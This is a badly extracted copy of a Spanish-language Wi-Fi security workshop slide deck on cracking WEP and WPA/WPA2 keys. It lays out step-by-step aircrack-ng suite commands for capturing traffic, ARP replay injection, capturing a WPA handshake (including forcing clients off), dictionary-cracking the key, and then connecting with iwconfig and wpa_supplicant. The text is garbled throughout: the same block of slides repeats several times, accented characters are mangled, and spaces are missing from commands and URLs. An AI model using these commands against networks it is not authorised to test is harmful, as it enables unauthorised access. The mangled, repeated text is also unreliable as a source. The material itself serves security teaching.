httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 71: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 72: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 73: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 74: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 75: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

